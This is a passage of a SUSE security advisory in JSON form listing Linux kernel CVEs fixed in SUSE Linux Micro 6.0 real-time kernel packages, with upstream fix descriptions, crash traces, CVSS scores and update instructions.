"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2024-53149"
},
{
"cve": "CVE-2025-22047",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-22047"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/microcode/AMD: Fix __apply_microcode_amd()\u0027s return value\n\nWhen verify_sha256_digest() fails, __apply_microcode_amd() should propagate\nthe failure by returning false (and not -1 which is promoted to true).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-22047",
"url": "https://www.suse.com/security/cve/CVE-2025-22047"
},
{
"category": "external",
"summary": "SUSE Bug 1241437 for CVE-2025-22047",
"url": "https://bugzilla.suse.com/1241437"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-22047"
},
{
"cve": "CVE-2025-37813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: xhci: Fix invalid pointer dereference in Etron workaround\n\nThis check is performed before prepare_transfer() and prepare_ring(), so\nenqueue can already point at the final link TRB of a segment. And indeed\nit will, some 0.4% of times this code is called.\n\nThen enqueue + 1 is an invalid pointer. It will crash the kernel right\naway or load some junk which may look like a link TRB and cause the real\nlink TRB to be replaced with a NOOP. This wouldn\u0027t end well.\n\nUse a functionally equivalent test which doesn\u0027t dereference the pointer\nand always gives correct result.\n\nSomething has crashed my machine twice in recent days while playing with\nan Etron HC, and a control transfer stress test ran for confirmation has\njust crashed it again. The same test passes with this patch applied.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37813",
"url": "https://www.suse.com/security/cve/CVE-2025-37813"
},
{
"category": "external",
"summary": "SUSE Bug 1242909 for CVE-2025-37813",
"url": "https://bugzilla.suse.com/1242909"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-37813"
},
{
"cve": "CVE-2025-37861",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37861"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: mpi3mr: Synchronous access b/w reset and tm thread for reply queue\n\nWhen the task management thread processes reply queues while the reset\nthread resets them, the task management thread accesses an invalid queue ID\n(0xFFFF), set by the reset thread, which points to unallocated memory,\ncausing a crash.\n\nAdd flag \u0027io_admin_reset_sync\u0027 to synchronize access between the reset,\nI/O, and admin threads. Before a reset, the reset handler sets this flag to\nblock I/O and admin processing threads. If any thread bypasses the initial\ncheck, the reset thread waits up to 10 seconds for processing to finish. If\nthe wait exceeds 10 seconds, the controller is marked as unrecoverable.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37861",
"url": "https://www.suse.com/security/cve/CVE-2025-37861"
},
{
"category": "external",
"summary": "SUSE Bug 1243055 for CVE-2025-37861",
"url": "https://bugzilla.suse.com/1243055"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-37861"
},
{
"cve": "CVE-2025-38243",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38243"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix invalid inode pointer dereferences during log replay\n\nIn a few places where we call read_one_inode(), if we get a NULL pointer\nwe end up jumping into an error path, or fallthrough in case of\n__add_inode_ref(), where we then do something like this:\n\n iput(\u0026inode-\u003evfs_inode);\n\nwhich results in an invalid inode pointer that triggers an invalid memory\naccess, resulting in a crash.\n\nFix this by making sure we don\u0027t do such dereferences.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38243",
"url": "https://www.suse.com/security/cve/CVE-2025-38243"
},
{
"category": "external",
"summary": "SUSE Bug 1246184 for CVE-2025-38243",
"url": "https://bugzilla.suse.com/1246184"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-38243"
},
{
"cve": "CVE-2025-38321",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38321"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: Log an error when close_all_cached_dirs fails\n\nUnder low-memory conditions, close_all_cached_dirs() can\u0027t move the\ndentries to a separate list to dput() them once the locks are dropped.\nThis will result in a \"Dentry still in use\" error, so add an error\nmessage that makes it clear this is what happened:\n\n[ 495.281119] CIFS: VFS: \\\\otters.example.com\\share Out of memory while dropping dentries\n[ 495.281595] ------------[ cut here ]------------\n[ 495.281887] BUG: Dentry ffff888115531138{i=78,n=/} still in use (2) [unmount of cifs cifs]\n[ 495.282391] WARNING: CPU: 1 PID: 2329 at fs/dcache.c:1536 umount_check+0xc8/0xf0\n\nAlso, bail out of looping through all tcons as soon as a single\nallocation fails, since we\u0027re already in trouble, and kmalloc() attempts\nfor subseqeuent tcons are likely to fail just like the first one did.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38321",
"url": "https://www.suse.com/security/cve/CVE-2025-38321"
},
{
"category": "external",
"summary": "SUSE Bug 1246328 for CVE-2025-38321",
"url": "https://bugzilla.suse.com/1246328"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-38321"
},
{
"cve": "CVE-2025-38322",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38322"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86/intel: Fix crash in icl_update_topdown_event()\n\nThe perf_fuzzer found a hard-lockup crash on a RaptorLake machine:\n\n Oops: general protection fault, maybe for address 0xffff89aeceab400: 0000\n CPU: 23 UID: 0 PID: 0 Comm: swapper/23\n Tainted: [W]=WARN\n Hardware name: Dell Inc. Precision 9660/0VJ762\n RIP: 0010:native_read_pmc+0x7/0x40\n Code: cc e8 8d a9 01 00 48 89 03 5b cd cc cc cc cc 0f 1f ...\n RSP: 000:fffb03100273de8 EFLAGS: 00010046\n ....\n Call Trace:\n \u003cTASK\u003e\n icl_update_topdown_event+0x165/0x190\n ? ktime_get+0x38/0xd0\n intel_pmu_read_event+0xf9/0x210\n __perf_event_read+0xf9/0x210\n\nCPUs 16-23 are E-core CPUs that don\u0027t support the perf metrics feature.\nThe icl_update_topdown_event() should not be invoked on these CPUs.\n\nIt\u0027s a regression of commit:\n\n f9bdf1f95339 (\"perf/x86/intel: Avoid disable PMU if !cpuc-\u003eenabled in sample read\")\n\nThe bug introduced by that commit is that the is_topdown_event() function\nis mistakenly used to replace the is_topdown_count() call to check if the\ntopdown functions for the perf metrics feature should be invoked.\n\nFix it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38322",
"url": "https://www.suse.com/security/cve/CVE-2025-38322"
},
{
"category": "external",
"summary": "SUSE Bug 1246447 for CVE-2025-38322",
"url": "https://bugzilla.suse.com/1246447"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 0,
"baseSeverity": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-38322"
},
{
"cve": "CVE-2025-38379",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38379"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix warning when reconnecting channel\n\nWhen reconnecting a channel in smb2_reconnect_server(), a dummy tcon\nis passed down to smb2_reconnect() with -\u003equery_interface\nuninitialized, so we can\u0027t call queue_delayed_work() on it.\n\nFix the following warning by ensuring that we\u0027re queueing the delayed\nworker from correct tcon.\n\nWARNING: CPU: 4 PID: 1126 at kernel/workqueue.c:2498 __queue_delayed_work+0x1d2/0x200\nModules linked in: cifs cifs_arc4 nls_ucs2_utils cifs_md4 [last unloaded: cifs]\nCPU: 4 UID: 0 PID: 1126 Comm: kworker/4:0 Not tainted 6.16.0-rc3 #5 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-4.fc42 04/01/2014\nWorkqueue: cifsiod smb2_reconnect_server [cifs]\nRIP: 0010:__queue_delayed_work+0x1d2/0x200\nCode: 41 5e 41 5f e9 7f ee ff ff 90 0f 0b 90 e9 5d ff ff ff bf 02 00\n00 00 e8 6c f3 07 00 89 c3 eb bd 90 0f 0b 90 e9 57 f\u003e 0b 90 e9 65 fe\nff ff 90 0f 0b 90 e9 72 fe ff ff 90 0f 0b 90 e9\nRSP: 0018:ffffc900014afad8 EFLAGS: 00010003\nRAX: 0000000000000000 RBX: ffff888124d99988 RCX: ffffffff81399cc1\nRDX: dffffc0000000000 RSI: ffff888114326e00 RDI: ffff888124d999f0\nRBP: 000000000000ea60 R08: 0000000000000001 R09: ffffed10249b3331\nR10: ffff888124d9998f R11: 0000000000000004 R12: 0000000000000040\nR13: ffff888114326e00 R14: ffff888124d999d8 R15: ffff888114939020\nFS: 0000000000000000(0000) GS:ffff88829f7fe000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007ffe7a2b4038 CR3: 0000000120a6f000 CR4: 0000000000750ef0\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n queue_delayed_work_on+0xb4/0xc0\n smb2_reconnect+0xb22/0xf50 [cifs]\n smb2_reconnect_server+0x413/0xd40 [cifs]\n ? __pfx_smb2_reconnect_server+0x10/0x10 [cifs]\n ? local_clock_noinstr+0xd/0xd0\n ? local_clock+0x15/0x30\n ? lock_release+0x29b/0x390\n process_one_work+0x4c5/0xa10\n ? __pfx_process_one_work+0x10/0x10\n ? __list_add_valid_or_report+0x37/0x120\n worker_thread+0x2f1/0x5a0\n ? __kthread_parkme+0xde/0x100\n ? __pfx_worker_thread+0x10/0x10\n kthread+0x1fe/0x380\n ? kthread+0x10f/0x380\n ? __pfx_kthread+0x10/0x10\n ? local_clock_noinstr+0xd/0xd0\n ? ret_from_fork+0x1b/0x1f0\n ? local_clock+0x15/0x30\n ? lock_release+0x29b/0x390\n ? rcu_is_watching+0x20/0x50\n ? __pfx_kthread+0x10/0x10\n ret_from_fork+0x15b/0x1f0\n ? __pfx_kthread+0x10/0x10\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\nirq event stamp: 1116206\nhardirqs last enabled at (1116205): [\u003cffffffff8143af42\u003e] __up_console_sem+0x52/0x60\nhardirqs last disabled at (1116206): [\u003cffffffff81399f0e\u003e] queue_delayed_work_on+0x6e/0xc0\nsoftirqs last enabled at (1116138): [\u003cffffffffc04562fd\u003e] __smb_send_rqst+0x42d/0x950 [cifs]\nsoftirqs last disabled at (1116136): [\u003cffffffff823d35e1\u003e] release_sock+0x21/0xf0",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38379",
"url": "https://www.suse.com/security/cve/CVE-2025-38379"
},
{
"category": "external",
"summary": "SUSE Bug 1247030 for CVE-2025-38379",
"url": "https://bugzilla.suse.com/1247030"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-38379"
},
{
"cve": "CVE-2025-38539",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38539"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Add down_write(trace_event_sem) when adding trace event\n\nWhen a module is loaded, it adds trace events defined by the module. It\nmay also need to modify the modules trace printk formats to replace enum\nnames with their values.\n\nIf two modules are loaded at the same time, the adding of the event to the\nftrace_events list can corrupt the walking of the list in the code that is\nmodifying the printk format strings and crash the kernel.\n\nThe addition of the event should take the trace_event_sem for write while\nit adds the new event.\n\nAlso add a lockdep_assert_held() on that semaphore in\n__trace_add_event_dirs() as it iterates the list.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38539",
"url": "https://www.suse.com/security/cve/CVE-2025-38539"
},
{
"category": "external",
"summary": "SUSE Bug 1248211 for CVE-2025-38539",
"url": "https://bugzilla.suse.com/1248211"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-38539"
},
{
"cve": "CVE-2025-38728",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38728"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb3: fix for slab out of bounds on mount to ksmbd\n\nWith KASAN enabled, it is possible to get a slab out of bounds\nduring mount to ksmbd due to missing check in parse_server_interfaces()\n(see below):\n\n BUG: KASAN: slab-out-of-bounds in\n parse_server_interfaces+0x14ee/0x1880 [cifs]\n Read of size 4 at addr ffff8881433dba98 by task mount/9827\n\n CPU: 5 UID: 0 PID: 9827 Comm: mount Tainted: G\n OE 6.16.0-rc2-kasan #2 PREEMPT(voluntary)\n Tainted: [O]=OOT_MODULE, [E]=UNSIGNED_MODULE\n Hardware name: Dell Inc. Precision Tower 3620/0MWYPT,\n BIOS 2.13.1 06/14/2019\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x9f/0xf0\n print_report+0xd1/0x670\n __virt_addr_valid+0x22c/0x430\n ? parse_server_interfaces+0x14ee/0x1880 [cifs]\n ? kasan_complete_mode_report_info+0x2a/0x1f0\n ? parse_server_interfaces+0x14ee/0x1880 [cifs]\n kasan_report+0xd6/0x110\n parse_server_interfaces+0x14ee/0x1880 [cifs]\n __asan_report_load_n_noabort+0x13/0x20\n parse_server_interfaces+0x14ee/0x1880 [cifs]\n ? __pfx_parse_server_interfaces+0x10/0x10 [cifs]\n ? trace_hardirqs_on+0x51/0x60\n SMB3_request_interfaces+0x1ad/0x3f0 [cifs]\n ? __pfx_SMB3_request_interfaces+0x10/0x10 [cifs]\n ? SMB2_tcon+0x23c/0x15d0 [cifs]\n smb3_qfs_tcon+0x173/0x2b0 [cifs]\n ? __pfx_smb3_qfs_tcon+0x10/0x10 [cifs]\n ? cifs_get_tcon+0x105d/0x2120 [cifs]\n ? do_raw_spin_unlock+0x5d/0x200\n ? cifs_get_tcon+0x105d/0x2120 [cifs]\n ? __pfx_smb3_qfs_tcon+0x10/0x10 [cifs]\n cifs_mount_get_tcon+0x369/0xb90 [cifs]\n ? dfs_cache_find+0xe7/0x150 [cifs]\n dfs_mount_share+0x985/0x2970 [cifs]\n ? check_path.constprop.0+0x28/0x50\n ? save_trace+0x54/0x370\n ? __pfx_dfs_mount_share+0x10/0x10 [cifs]\n ? __lock_acquire+0xb82/0x2ba0\n ? __kasan_check_write+0x18/0x20\n cifs_mount+0xbc/0x9e0 [cifs]\n ? __pfx_cifs_mount+0x10/0x10 [cifs]\n ? do_raw_spin_unlock+0x5d/0x200\n ? cifs_setup_cifs_sb+0x29d/0x810 [cifs]\n cifs_smb3_do_mount+0x263/0x1990 [cifs]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38728",
"url": "https://www.suse.com/security/cve/CVE-2025-38728"
},
{
"category": "external",
"summary": "SUSE Bug 1249256 for CVE-2025-38728",
"url": "https://bugzilla.suse.com/1249256"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-38728"
},
{
"cve": "CVE-2025-39689",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39689"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nftrace: Also allocate and copy hash for reading of filter files\n\nCurrently the reader of set_ftrace_filter and set_ftrace_notrace just adds\nthe pointer to the global tracer hash to its iterator. Unlike the writer\nthat allocates a copy of the hash, the reader keeps the pointer to the\nfilter hashes. This is problematic because this pointer is static across\nfunction calls that release the locks that can update the global tracer\nhashes. This can cause UAF and similar bugs.\n\nAllocate and copy the hash for reading the filter files like it is done\nfor the writers. This not only fixes UAF bugs, but also makes the code a\nbit simpler as it doesn\u0027t have to differentiate when to free the\niterator\u0027s hash between writers and readers.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
